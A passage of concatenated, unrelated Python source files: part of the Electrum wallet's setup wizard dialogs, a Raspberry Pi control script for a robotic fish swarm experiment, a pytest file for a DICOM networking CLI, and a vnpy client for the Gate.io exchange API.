':\n' + path if self.question(msg): os.remove(path) self.show_warning(_('The file was removed')) return action = self.storage.get_action() if action and action not in ('new', 'upgrade_storage'): self.hide() msg = _("The file '{}' contains an incompletely created wallet.\n" "Do you want to complete its creation now?").format(path) if not self.question(msg): if self.question(_("Do you want to delete '{}'?").format(path)): os.remove(path) self.show_warning(_('The file was removed')) return self.show() if action: # self.wallet is set in run self.run(action) return self.wallet self.wallet = Wallet(self.storage) return self.wallet def finished(self): """Called in hardware client wrapper, in order to close popups.""" return def on_error(self, exc_info): if not isinstance(exc_info[1], UserCancelled): traceback.print_exception(*exc_info) self.show_error(str(exc_info[1])) def set_icon(self, filename): prior_filename, self.icon_filename = self.icon_filename, filename self.logo.setPixmap(QPixmap(icon_path(filename)) .scaledToWidth(60, mode=Qt.SmoothTransformation)) return prior_filename def set_layout(self, layout, title=None, next_enabled=True): self.title.setText("<b>%s</b>"%title if title else "") self.title.setVisible(bool(title)) # Get rid of any prior layout by assigning it to a temporary widget prior_layout = self.main_widget.layout() if prior_layout: QWidget().setLayout(prior_layout) self.main_widget.setLayout(layout) self.back_button.setEnabled(True) self.next_button.setEnabled(next_enabled) if next_enabled: self.next_button.setFocus() self.main_widget.setVisible(True) self.please_wait.setVisible(False) def exec_layout(self, layout, title=None, raise_on_cancel=True, next_enabled=True): self.set_layout(layout, title, next_enabled) result = self.loop.exec_() if not result and raise_on_cancel: raise UserCancelled if result == 1: raise GoBack from None self.title.setVisible(False) self.back_button.setEnabled(False) self.next_button.setEnabled(False) self.main_widget.setVisible(False) self.please_wait.setVisible(True) self.refresh_gui() return result def refresh_gui(self): # For some reason, to refresh the GUI this needs to be called twice self.app.processEvents() self.app.processEvents() def remove_from_recently_open(self, filename): self.config.remove_from_recently_open(filename) def text_input(self, title, message, is_valid, allow_multi=False): slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid, allow_multi=allow_multi) self.exec_layout(slayout, title, next_enabled=False) return slayout.get_text() def seed_input(self, title, message, is_seed, options): slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self) self.exec_layout(slayout, title, next_enabled=False) return slayout.get_seed(), slayout.is_bip39, slayout.is_ext @wizard_dialog def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False): header_layout = QHBoxLayout() label = WWLabel(message) label.setMinimumWidth(400) header_layout.addWidget(label) if show_wif_help: header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) return self.text_input(title, header_layout, is_valid, allow_multi) @wizard_dialog def add_cosigner_dialog(self, run_next, index, is_valid): title = _("Add Cosigner") + " %d"%index message = ' '.join([ _('Please enter the master public key (xpub) of your cosigner.'), _('Enter their master private key (xprv) if you want to be able to sign for them.') ]) return self.text_input(title, message, is_valid) @wizard_dialog def restore_seed_dialog(self, run_next, test): options = [] if self.opt_ext: options.append('ext') if self.opt_bip39: options.append('bip39') title = _('Enter Seed') message = _('Please enter your seed phrase in order to restore your wallet.') return self.seed_input(title, message, test, options) @wizard_dialog def confirm_seed_dialog(self, run_next, test): self.app.clipboard().clear() title = _('Confirm Seed') message = ' '.join([ _('Your seed is important!'), _('If you lose your seed, your money will be permanently lost.'), _('To make sure that you have properly saved your seed, please retype it here.') ]) seed, is_bip39, is_ext = self.seed_input(title, message, test, None) return seed @wizard_dialog def show_seed_dialog(self, run_next, seed_text): title = _("Your wallet generation seed is:") slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext']) self.exec_layout(slayout) return slayout.is_ext def pw_layout(self, msg, kind, force_disable_encrypt_cb): playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button, force_disable_encrypt_cb=force_disable_encrypt_cb) playout.encrypt_cb.setChecked(True) self.exec_layout(playout.layout()) return playout.new_password(), playout.encrypt_cb.isChecked() @wizard_dialog def request_password(self, run_next, force_disable_encrypt_cb=False): """Request the user enter a new password and confirm it. Return the password or None for no password.""" return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb) @wizard_dialog def request_storage_encryption(self, run_next): playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION) playout.encrypt_cb.setChecked(True) self.exec_layout(playout.layout()) return playout.encrypt_cb.isChecked() @wizard_dialog def confirm_dialog(self, title, message, run_next): self.confirm(message, title) def confirm(self, message, title): label = WWLabel(message) vbox = QVBoxLayout() vbox.addWidget(label) self.exec_layout(vbox, title) @wizard_dialog def action_dialog(self, action, run_next): self.run(action) def terminate(self): self.accept_signal.emit() def waiting_dialog(self, task, msg, on_finished=None): label = WWLabel(msg) vbox = QVBoxLayout() vbox.addSpacing(100) label.setMinimumWidth(300) label.setAlignment(Qt.AlignCenter) vbox.addWidget(label) self.set_layout(vbox, next_enabled=False) self.back_button.setEnabled(False) t = threading.Thread(target=task) t.start() while True: t.join(1.0/60) if t.is_alive(): self.refresh_gui() else: break if on_finished: on_finished() @wizard_dialog def choice_dialog(self, title, message, choices, run_next): c_values = [x[0] for x in choices] c_titles = [x[1] for x in choices] clayout = ChoicesLayout(message, c_titles) vbox = QVBoxLayout() vbox.addLayout(clayout.layout()) self.exec_layout(vbox, title) action = c_values[clayout.selected_index()] return action def query_choice(self, msg, choices): """called by hardware wallets""" clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout() vbox.addLayout(clayout.layout()) self.exec_layout(vbox, '') return clayout.selected_index() @wizard_dialog def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]], message2: str, test_text: Callable[[str], int], run_next, default_choice_idx: int=0) -> Tuple[str, str]: vbox = QVBoxLayout() c_values = [x[0] for x in choices] c_titles = [x[1] for x in choices] c_default_text = [x[2] for x in choices] def on_choice_click(clayout): idx = clayout.selected_index() line.setText(c_default_text[idx]) clayout = ChoicesLayout(message1, c_titles, on_choice_click, checked_index=default_choice_idx) vbox.addLayout(clayout.layout()) vbox.addSpacing(50) vbox.addWidget(WWLabel(message2)) line = QLineEdit() def on_text_change(text): self.next_button.setEnabled(test_text(text)) line.textEdited.connect(on_text_change) on_choice_click(clayout) # set default text for "line" vbox.addWidget(line) self.exec_layout(vbox, title) choice = c_values[clayout.selected_index()] return str(line.text()), choice @wizard_dialog def line_dialog(self, run_next, title, message, default, test, warning='', presets=(), warn_issue4566=False): vbox = QVBoxLayout() vbox.addWidget(WWLabel(message)) line = QLineEdit() line.setText(default) def f(text): self.next_button.setEnabled(test(text)) if warn_issue4566: text_whitespace_normalised = ' '.join(text.split()) warn_issue4566_label.setVisible(text != text_whitespace_normalised) line.textEdited.connect(f) vbox.addWidget(line) vbox.addWidget(WWLabel(warning)) warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566) warn_issue4566_label.setVisible(False) vbox.addWidget(warn_issue4566_label) for preset in presets: button = QPushButton(preset[0]) button.clicked.connect(lambda __, text=preset[1]: line.setText(text)) button.setMinimumWidth(150) hbox = QHBoxLayout() hbox.addWidget(button, alignment=Qt.AlignCenter) vbox.addLayout(hbox) self.exec_layout(vbox, title, next_enabled=test(default)) return line.text() @wizard_dialog def show_xpub_dialog(self, xpub, run_next): msg = ' '.join([ _("Here is your master public key."), _("Please share it with your cosigners.") ]) vbox = QVBoxLayout() layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False) vbox.addLayout(layout.layout()) self.exec_layout(vbox, _('Master Public Key')) return None def init_network(self, network): message = _("Electrum communicates with remote servers to get " "information about your transactions and addresses. The " "servers all fulfill the same purpose only differing in " "hardware. In most cases you simply want to let Electrum " "pick one at random. However if you prefer feel free to " "select a server manually.") choices = [_("Auto connect"), _("Select server manually")] title = _("How do you want to connect to a server? ") clayout = ChoicesLayout(message, choices) self.back_button.setText(_('Cancel')) self.exec_layout(clayout.layout(), title) r = clayout.selected_index() if r == 1: nlayout = NetworkChoiceLayout(network, self.config, wizard=True) if self.exec_layout(nlayout.layout()): nlayout.accept() else: network.auto_connect = True self.config.set_key('auto_connect', True, True) @wizard_dialog def multisig_dialog(self, run_next): cw = CosignWidget(2, 2) m_edit = QSlider(Qt.Horizontal, self) n_edit = QSlider(Qt.Horizontal, self) n_edit.setMinimum(2) n_edit.setMaximum(15) m_edit.setMinimum(1) m_edit.setMaximum(2) n_edit.setValue(2) m_edit.setValue(2) n_label = QLabel() m_label = QLabel() grid = QGridLayout() grid.addWidget(n_label, 0, 0) grid.addWidget(n_edit, 0, 1) grid.addWidget(m_label, 1, 0) grid.addWidget(m_edit, 1, 1) def on_m(m): m_label.setText(_('Require {0} signatures').format(m)) cw.set_m(m) def on_n(n): n_label.setText(_('From {0} cosigners').format(n)) cw.set_n(n) m_edit.setMaximum(n) n_edit.valueChanged.connect(on_n) m_edit.valueChanged.connect(on_m) on_n(2) on_m(2) vbox = QVBoxLayout() vbox.addWidget(cw) vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:"))) vbox.addLayout(grid) self.exec_layout(vbox, _("Multi-Signature Wallet")) m = int(m_edit.value()) n = int(n_edit.value()) return (m, n)
exp_LJpot.py
import RPi.GPIO as GPIO GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) import os import time import threading import numpy as np from picamera import PiCamera from lib_utils import * from lib_photodiode import Photodiode from lib_depthsensor import DepthSensor from lib_fin import Fin from lib_leds import LEDS from lib_vision import Vision os.makedirs('./data/{}/'.format(U_FILENAME)) def initialize(): """Initializes all threads which are running fins and a logger instance for the overall status """ threading.Thread(target=caudal.run).start() threading.Thread(target=dorsal.run).start() threading.Thread(target=pecto_l.run).start() threading.Thread(target=pecto_r.run).start() leds.on() time.sleep(1) leds.off() def idle(): """Waiting for starting signal, then signal UUID """ thresh_photodiode = 50 # lights off: 2, lights on: 400 -> better range! while photodiode.brightness > thresh_photodiode: photodiode.update() time.sleep(4) t_blink = time.time() for blink in range(U_UUID): leds.on() time.sleep(0.2) leds.off() time.sleep(0.2) elapsed_time = time.time() - t_blink sleep_time = 12 - elapsed_time time.sleep(sleep_time) # wait such that all robots leave idle before LEDs are on t_start = time.time() return t_start def terminate(): """Terminates all threads which are running fins """ caudal.terminate() dorsal.terminate() pecto_l.terminate() pecto_r.terminate() time.sleep(1) leds.on() time.sleep(1) leds.off() GPIO.cleanup() def log_status(t_passed, depth_mm, target_dist, target_x, target_y, target_z, no_neighbors): """Logs the overall status of BlueBot Args: t_passed (float): Time since the beginning of the experiment, [s] distance (float): Distance to LED pair, [mm] heading (float): x-position of an LED pair, [mm] status (string): Status in the finite state machine """ with open('./data/{}/{}_status.log'.format(U_FILENAME, U_UUID), 'a') as f: f.write('{:.2f},{},{},{},{},{},{}\n'.format(t_passed, depth_mm, round(target_dist), round(target_x), round(target_y), round(target_z), no_neighbors)) def avoid_duplicates_by_angle(): """Use right and left cameras just up to the xz-plane such that the overlapping camera range disappears and there are no duplicates. Returns: tuple: all_blobs (that are valid, i.e. not duplicates) and their all_angles """ right = np.transpose(vision.pqr_r) left = np.transpose(vision.pqr_l) all_blobs = np.empty((3,0)) all_angles = np.empty(0) for r in right: angle = np.arctan2(r[1], r[0]) * 180 / pi if angle > -5: all_blobs = np.append(all_blobs, [[r[0]], [r[1]], [r[2]]], axis=1) all_angles = np.append(all_angles, angle) for l in left: angle = np.arctan2(l[1], l[0]) * 180 / pi if angle < 5: all_blobs = np.append(all_blobs, [[l[0]], [l[1]], [l[2]]], axis=1) all_angles = np.append(all_angles, angle) return (all_blobs, all_angles) def parse(all_blobs, all_angles): """Assigns duos of blobs to single robots Idea: Sort all blobs by the angles/directions they are coming from. Pair duos of blobs that have most similar angles. Args: all_blobs (np.array): all valid blobs from both images all_angles (np.array): all angles in xy-plane of all valid blobs Returns: tuple: set of neighbors and dict with their relative positions """ neighbors = set() rel_pos = {} no_blobs = len(all_angles) if no_blobs < 2: # 0 robots return (neighbors, rel_pos) sorted_indices = np.argsort(all_angles) angle_thresh = 5 # below which 2 blobs are considered a duo i = 0 # blob_ind neighbor_ind = 0 while i < no_blobs-1: # iterate through all blobs and fill dict # if 2 blobs are too far apart, ignore first one and check next 2 dangle = abs(all_angles[sorted_indices[i+1]] - all_angles[sorted_indices[i]]) if dangle > angle_thresh: i += 1 continue # else, add 2 blobs b1 = all_blobs[:,sorted_indices[i]] b2 = all_blobs[:,sorted_indices[i+1]] # check for reflections ref = 0 if i+2 < no_blobs-1: dangle = abs(all_angles[sorted_indices[i+2]] - all_angles[sorted_indices[i]]) if dangle < angle_thresh: # a 3rd blob from same direction? ref = 1 b3 = all_blobs[:,sorted_indices[i+2]] # who is closest to the surface? pitch1 = (np.arctan2(b1[2], sqrt(b1[0]**2 + b1[1]**2)) * 180 / pi, 1) pitch2 = (np.arctan2(b2[2], sqrt(b2[0]**2 + b2[1]**2)) * 180 / pi, 2) pitch3 = (np.arctan2(b3[2], sqrt(b3[0]**2 + b3[1]**2)) * 180 / pi, 3) min_pitch = min(pitch1, pitch2, pitch3)[1] # smallest angle (negative) is closest to surface and will be discarded if min_pitch == 1: b1 = b3 elif min_pitch == 2: b2 = b3 if i+3 < no_blobs-1: dangle = abs(all_angles[sorted_indices[i+3]] - all_angles[sorted_indices[i]]) if dangle < angle_thresh: # a 4th blob from same direction? ref = 2 b4 = all_blobs[:,sorted_indices[i+3]] # who is closest to the surface? pitch4 = (np.arctan2(b4[2], sqrt(b4[0]**2 + b4[1]**2)) * 180 / pi, 4) min_pitch = min(pitch1, pitch2, pitch4)[1] # smallest angle (negative) if min_pitch == 1: b1 = b4 elif min_pitch == 2: b2 = b4 # add final duo as neighbor with averaged xyz coordinates pqr = np.transpose(np.vstack((b1, b2))) xyz = vision._pqr_to_xyz(pqr) neighbors.add(neighbor_ind) rel_pos[neighbor_ind] = (xyz[:,0] + xyz[:,1]) / 2 i += 2 + ref neighbor_ind += 1 return(neighbors, rel_pos) def lj_force(neighbors, rel_pos): """Derives the Lennard-Jones potential and force based on the relative positions of all neighbors and the desired target_dist to neighbors. The force is a gain factor, attracting or repelling a fish from a neighbor. The center is a point in space toward which the fish will move, based on the sum of all weighted neighbor positions. Args: neighbors (set): Visible neighbors rel_pos (dict): Relative positions of visible neighbors Returns: np.array: Weighted 3D direction based on visible neighbors """ center = np.zeros((3,)) magn = 0 if not neighbors: return (center, magn) # (a=12,b=6) is standard and ratio has to be 2:1, lower numbers for less aggressive repulsion, e.g. (a=6,b=3) a = 12 b = 6 # epsilon and gamma are only scaling factors and without effect after normalization epsilon = 100 # depth of potential well, V_LJ(r_target) = epsilon gamma = 1 # force gain r_target = target_dist r_const = r_target + 2*BL #xx for neighbor in neighbors: r = np.clip(np.linalg.norm(rel_pos[neighbor]), 0.001, r_const) f_lj = -gamma * epsilon /r * (a * (r_target / r)**a - 2 * b * (r_target / r)**b) center += f_lj * rel_pos[neighbor] center /= len(neighbors) magn = np.linalg.norm(center) # normalize center /= magn # normalize return (center, magn) def home(target, magnitude): """Controls the pectoral fins to follow an object using both cameras The "heading" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(q^2 + p^2)). A positive angle switches the pectoral left fin on turn clockwise. A negative angles switches the pectoral right fin on to turn counterclockwise. Returns: (): Floats to the surface and turns on the spot if no object observed """ caudal_range = 35 # abs(heading) below which caudal fin is switched on freq_c = min(1.5 + 1/250 * magnitude, 2) caudal.set_frequency(freq_c) # blob behind or lost if not target.size: pecto_r.off() pecto_l.off() caudal.off() return # calculate heading heading = np.arctan2(target[1], target[0]) * 180 / pi # target behind if heading > 155 or heading < -155: caudal.off() pecto_r.set_frequency(2.5) pecto_r.on() pecto_l.set_frequency(2.5) pecto_l.on() # target in front elif heading < 10 and heading > -10: pecto_r.off() pecto_l.off() caudal.on() # target to the right elif heading > 10: freq_l = 1 + 1.5 * abs(heading) / 155 pecto_l.set_frequency(freq_l) pecto_l.on() pecto_r.off() if heading < caudal_range: caudal.on() else: caudal.off() # target to the left elif heading < -10: freq_r = 1 + 1.5 * abs(heading) / 155 pecto_r.set_frequency(freq_r) pecto_r.on() pecto_l.off() if heading > -caudal_range: caudal.on() else: caudal.off() def depth_ctrl_from_cam(target): """Controls the diving depth to stay level with an observed object using both cameras. Swithes to depth sensor based depth control when on level with object. The "pitch" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(p^2 + q^2)). A positive angle switches the dorsal fin on to move down. A negative angles switches the dorsal fin off to move up. Returns: (): Floats to the surface if no object observed """ pitch_range = 2 # abs(pitch) below which dorsal fin is not controlled pitch = np.arctan2(target[2], sqrt(target[0]**2 + target[1]**2)) * 180 / pi if pitch > pitch_range: dorsal.on() elif pitch < -pitch_range: dorsal.off() def main(run_time=60): t_passed = 0 iteration = 0 t_main = time.time() - t_start t_change = t_main while t_passed < run_time + t_main: # check environment and find blob centroids of leds try: vision.update() except: continue # find all valid blobs and their respective angles all_blobs, all_angles = avoid_duplicates_by_angle() # match blob duos by angle neighbors, rel_pos = parse(all_blobs, all_angles) # find target move with lj force target, magnitude = lj_force(neighbors, rel_pos) # move home(target, magnitude) depth_ctrl_from_cam(target) # switch behavior if t_passed - t_change > run_time / 2: # set to 2 for plateau #leds.off() global target_dist if target_dist == upper_thresh: target_dist = lower_thresh else: target_dist = upper_thresh t_change = time.time() - t_start #time.sleep(1.5) #leds.on() # update counters t_passed = time.time() - t_start iteration += 1 # log status #if iteration % 2 == 0: depth_sensor.update() depth_mm = max(0, (depth_sensor.pressure_mbar - surface_pressure) * 10.197162129779) log_status(t_passed, depth_mm, target_dist, target[0], target[1], target[2], len(neighbors)) BL = 160 # body length, [mm] max_centroids = 0 # (robots-1)*2, excess centroids are reflections lower_thresh = 0.6*BL upper_thresh = 1.6*BL target_dist = upper_thresh # distance to neighbors, [mm] caudal = Fin(U_FIN_C1, U_FIN_C2, 1.5) # freq, [Hz] dorsal = Fin(U_FIN_D1, U_FIN_D2, 6) # freq, [Hz] pecto_r = Fin(U_FIN_PR1, U_FIN_PR2, 2.5) # freq, [Hz] pecto_l = Fin(U_FIN_PL1, U_FIN_PL2, 2.5) # freq, [Hz] photodiode = Photodiode() leds = LEDS() vision = Vision(max_centroids) # 0 disables reflections() in lib_blob depth_sensor = DepthSensor() depth_sensor.update() surface_pressure = depth_sensor.pressure_mbar initialize() t_start = idle() leds.on() main(240) # run time, [s] leds.off() terminate()
net_test.py
# Copyright (C) 2019-2020, Therapixel SA. # All rights reserved. # This file is subject to the terms and conditions described in the # LICENSE file distributed in this package. """Test that the config functionalities of the pacsanini package can be correctly accessed from the command line. """ import socket from threading import Thread from time import sleep import pytest from click.testing import CliRunner from pacsanini.cli.net import echo_cli, server_cli @pytest.mark.cli @pytest.mark.net def test_config_stdout(test_config_path): """Test that the net commands work well.""" runner = CliRunner() result_yaml = runner.invoke(echo_cli, ["--config", test_config_path, "--debug"]) assert result_yaml.exit_code == 0 assert result_yaml.output @pytest.mark.cli class TestStorescpCli: """Test that a storescp server can be instantiated from the command line.""" def setup(self): """Get a hold of the server thread.""" self.server_thread: Thread = None def teardown(self): """Make sure that the server thread will be stopped.""" if self.server_thread is not None and self.server_thread.is_alive(): self.server_thread.join(1) def test_server(self, test_config_path): """Test that a storescp server can be started from the command line. """ def run_server(): runner = CliRunner() result = runner.invoke( server_cli, ["--config", test_config_path, "--debug"] ) assert result.output self.server_thread = Thread(target=run_server, daemon=True) self.server_thread.start() sleep(3) # give time for the server to start with pytest.raises(socket.error): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("", 104))
vngate.py
# encoding: utf-8 import urllib import sys import json from time import time, sleep from threading import Thread import urllib.parse as urlparse from datetime import datetime import base64 import hmac import hashlib import json import gzip, binascii, os import http.client as httplib import traceback from vnpy.trader.vtFunction import systemSymbolToVnSymbol , VnSymbolToSystemSymbol import json API_QUERY_URL = 'data.gate.io' API_TRADE_URL = 'api.gate.io' FUNCTIONCODE_GET_SYMBOS_GATE = "pairs" FUNCTIONCODE_GET_MARKETINFO_GATE = "marketinfo" # 市场订单参数 FUNCTIONCODE_GET_MARKETLIST_GATE = "marketlist" # 市场详细行情 FUNCTIONCODE_POST_BALANCE_GATE = "balances" FUNCTIONCODE_POST_BUY_GATE = "buy" FUNCTIONCODE_POST_SELL_GATE = "sell" FUNCTIONCODE_POST_CANCEL_ORDERS_GATE = "cancelOrder" FUNCTIONCODE_POST_ORDER_INFO_GATE = "getOrder" FUNCTIONCODE_POST_ORDER_LIST_GATE = "openOrders" FUNCTIONCODE_POST_HISTORY_TRADE = "tradeHistory" ''' 通过 TradeApi完成 ''' class Gate_TradeApi(object): #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.accessKey = '' self.secretKey = '' self.active = False # API工作状态 self.reqID = 0 # 请求编号 #self.reqQueue = Queue() # 请求队列 self.reqQueue = [] # 请求的队列 self.reqThread = Thread(target=self.processQueue) # 请求处理线程 self.account_id = None #---------------------------------------------------------------------- def processRequest(self, req): """处理请求""" # 读取方法和参数 try: url = req['url'] method = req['method'] kwargs = req['kwargs'] resource = req["resource"] data = None if method in [FUNCTIONCODE_GET_SYMBOS_GATE , FUNCTIONCODE_GET_MARKETINFO_GATE]: data = self.httpGet( url, resource, '') elif method in [FUNCTIONCODE_POST_BALANCE_GATE , FUNCTIONCODE_POST_BUY_GATE , FUNCTIONCODE_POST_SELL_GATE , FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , FUNCTIONCODE_POST_HISTORY_TRADE , FUNCTIONCODE_POST_ORDER_INFO_GATE , FUNCTIONCODE_POST_ORDER_LIST_GATE]: data = self.httpPost( url, resource, kwargs ) # 添加额外信息 if method == FUNCTIONCODE_POST_CANCEL_ORDERS_GATE: data["systemID"] = kwargs["orderNumber"] return data except Exception as ex: print(u'processRequest Exception:{},{}'.format(str(ex),traceback.format_exc()),file=sys.stderr) return None #---------------------------------------------------------------------- def processQueue(self): """处理请求队列中的请求""" while self.active: try: if len(self.reqQueue) == 0: sleep(0.1) continue (Type , req) = self.reqQueue[0] callback = req['callback'] reqID = req['reqID'] try: data = self.processRequest(req) # 请求成功 if data != None : callback(data, req, reqID) except Exception as ex: print(u'processQueue1 Exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr) self.reqQueue.pop(0) sleep(0.1) except Exception as ex: print(u'processQueue2 Exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr) #---------------------------------------------------------------------- def is_same_req(self, req1 , req2): flag = False try: if req1["kwargs"]["orderNumber"] == req2["kwargs"]["orderNumber"]: return True except Exception as ex: print( "Error in is_same_req , req1:{} , req2:{}, ex:{}".format(req1 , req2,str(ex))) return flag #---------------------------------------------------------------------- def sendRequest(self, url , resource , method, callback, kwargs = None,optional=None): """发送请求""" # 请求编号加1 self.reqID += 1 # 生成请求字典并放入队列中 req = {} req['url'] = url req['resource'] = resource req['method'] = method req['callback'] = callback req['optional'] = optional req['kwargs'] = kwargs req['reqID'] = self.reqID if method in [ FUNCTIONCODE_POST_BALANCE_GATE , FUNCTIONCODE_POST_ORDER_LIST_GATE]: flag = False for use_method ,r in self.reqQueue: if use_method == method: flag = True break if False == flag: self.reqQueue.append( (method , req)) elif method in [ FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , FUNCTIONCODE_POST_ORDER_INFO_GATE]: flag = False for use_method, r in self.reqQueue: if use_method == method: if self.is_same_req( r , req) == True: flag = True break if False == flag: self.reqQueue.append( (method , req)) else: self.reqQueue.append( (method , req)) #self.reqQueue.put(req) # 返回请求编号 return self.reqID #---------------------------------------------------------------------- #################################################### ## 主动函数 #################################################### #---------------------------------------------------------------------- def init(self, accessKey, secretKey): """初始化""" self.accessKey = accessKey self.secretKey = secretKey self.active = True self.reqThread.start() #---------------------------------------------------------------------- def exit(self): """退出""" self.active = False if self.reqThread.isAlive(): self.reqThread.join() #---------------------------------------------------------------------- def getSign(self, params, secretKey): bSecretKey = secretKey.encode(encoding='UTF-8') sign = '' for key in params.keys(): value = str(params[key]) sign += key + '=' + value + '&' sign = sign[:-1] bSign = sign.encode(encoding='UTF-8') mySign = hmac.new(bSecretKey, bSign, hashlib.sha512).hexdigest() return mySign #---------------------------------------------------------------------- def httpGet(self, url, resource, params=''): conn = httplib.HTTPSConnection(url, timeout=10) conn.request("GET", resource + '/' + params) response = conn.getresponse() data = response.read().decode('utf-8') return json.loads(data) #---------------------------------------------------------------------- def httpPost(self, url, resource, params ): headers = { "Accept": "application/json", 'Content-Type': 'application/x-www-form-urlencoded', "User-Agent": "Chrome/39.0.2171.71", "KEY":self.accessKey, "SIGN":self.getSign(params, self.secretKey) } conn = httplib.HTTPSConnection(url, timeout=10 ) tempParams = urllib.parse.urlencode(params) if params else '' conn.request("POST", resource, tempParams, headers) response = conn.getresponse() data = response.read().decode('utf-8') conn.close() return json.loads(data) #---------------------------------------------------------------------- def get_symbols(self): print(u'get_symbols') return self.sendRequest( API_QUERY_URL , "/api2/1/pairs" , FUNCTIONCODE_GET_SYMBOS_GATE , self.onAllSymbols , kwargs = {} , optional = None) #---------------------------------------------------------------------- def get_market_info(self): print(u'get_market_info') return self.sendRequest( API_QUERY_URL , "/api2/1/marketinfo" , FUNCTIONCODE_GET_MARKETINFO_GATE , self.onMarketInfo , kwargs = {} , optional = None) #---------------------------------------------------------------------- def get_balance(self): # print(u'get_balance') return self.sendRequest( API_TRADE_URL , "/api2/1/private/balances" ,FUNCTIONCODE_POST_BALANCE_GATE , self.onBalances , kwargs = {} , optional = None) #---------------------------------------------------------------------- def spotBuy(self , symbol, rate, amount): print(u'spotBuy(self , %s, %s, %s)' % ( symbol, str(rate), str(amount))) kwargs = {'currencyPair': symbol,'rate':rate, 'amount':amount} return self.sendRequest( API_TRADE_URL , "/api2/1/private/buy" , FUNCTIONCODE_POST_BUY_GATE , self.onSpotTrade , kwargs = kwargs , optional = None) #---------------------------------------------------------------------- def spotSell(self , symbol, rate, amount): print(u'spotSell(self , %s, %s, %s)' % (symbol , str(rate) , str(amount))) kwargs = {'currencyPair': symbol,'rate':rate, 'amount':amount} return self.sendRequest( API_TRADE_URL , "/api2/1/private/sell" , FUNCTIONCODE_POST_SELL_GATE , self.onSpotTrade , kwargs = kwargs , optional = None) #---------------------------------------------------------------------- def spotTrade(self, symbol , amount, _type , price ): if _type == "buy": return self.spotBuy( symbol , price , amount ) elif _type == "sell": return self.spotSell( symbol , price , amount ) else: return None #---------------------------------------------------------------------- def cancel_order(self , symbol , order_id): # print(u'cancel_order(self , %s , %s)' % (symbol , str(order_id))) kwargs = {"currencyPair" : symbol , "orderNumber" : order_id} return self.sendRequest( API_TRADE_URL ,"/api2/1/private/cancelOrder" , FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , self.onCancelOrder , kwargs = kwargs , optional = None ) #---------------------------------------------------------------------- def getOrder( self, symbol , order_id ): # print(u'getOrder( self, %s , %s )' % (symbol , order_id)) kwargs = {"currencyPair" : symbol , "orderNumber" : order_id} return self.sendRequest( API_TRADE_URL , "/api2/1/private/getOrder" , FUNCTIONCODE_POST_ORDER_INFO_GATE , self.onOrderInfo , kwargs = kwargs , optional = None) #---------------------------------------------------------------------- def listTradeHistory(self , symbol ): kwargs = {"currencyPair" : symbol } return self.sendRequest( API_TRADE_URL , "/api2/1/private/tradeHistory" , FUNCTIONCODE_POST_HISTORY_TRADE , self.onTradeList , kwargs = kwargs , optional = None) #---------------------------------------------------------------------- def listOpenOrders( self): # print(u'listOpenOrders( self)') return self.sendRequest( API_TRADE_URL , "/api2/1/private/openOrders" , FUNCTIONCODE_POST_ORDER_LIST_GATE , self.onOrderList , kwargs = {} , optional = None) #---------------------------------------------------------------------- def onBalances(self,data, req, reqID): print(u'onBalances(self, data, req, reqID)') print(data) # ---------------------------------------------------------------------- def onAllSymbols(self,data, req, reqID): print(u'onAllSymbols(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onMarketInfo(self,data, req, reqID): print(u'onMarketInfo(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onSpotTrade(self,data, req, reqID): print(u'onSpotTrade(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onCancelOrder(self,data, req, reqID): print(u'onCancelOrder(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onOrderInfo(self,data, req, reqID): print(u'onOrderInfo(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onOrderList(self,data, req, reqID): print(u'onOrderList(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onTradeList(self,data, req, reqID): print(u'onTradeList(self, data, req, reqID)') print(data) ''' 通过 DataApi完成 ''' class Gate_DataApi(object): #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.active = False self.taskInterval = 3 # 每轮请求延时 self.taskList = [] # 订阅的任务列表 self.taskThread = Thread(target=self.run) # 处理任务的线程 #---------------------------------------------------------------------- def init(self, interval, debug): """初始化""" self.taskInterval = interval self.DEBUG = debug self.active = True self.taskThread.start() #---------------------------------------------------------------------- def exit(self): """退出""" self.active = False if self.taskThread.isAlive(): self.taskThread.join() #---------------------------------------------------------------------- def run(self): """连续运行""" while self.active: for url, resource ,callback ,params in self.taskList: try: data = self.http_get_request(url, resource , params ) if isinstance(data , dict): data["currencyPair"] = params callback( data ) except Exception as ex: print(u'run exception:{},{}'.format(str(ex),traceback.format_exc()),file=sys.stderr) sleep(self.taskInterval) # ---------------------------------------------------------------------- def http_get_request(self, url, resource ,params ): conn = httplib.HTTPSConnection(url, timeout=10) conn.request("GET", resource + '/' + params) try: response = conn.getresponse() data = response.read().decode('utf-8') return json.loads(data) except Exception as e: print("httpGet failed, detail is:%s" %e) return {"status":"fail","msg":e} #---------------------------------------------------------------------- def subscribeTick(self, symbol): """订阅实时成交数据""" url = "/api2/1/ticker" task = (API_QUERY_URL , url , self.onTick , symbol) self.taskList.append(task) 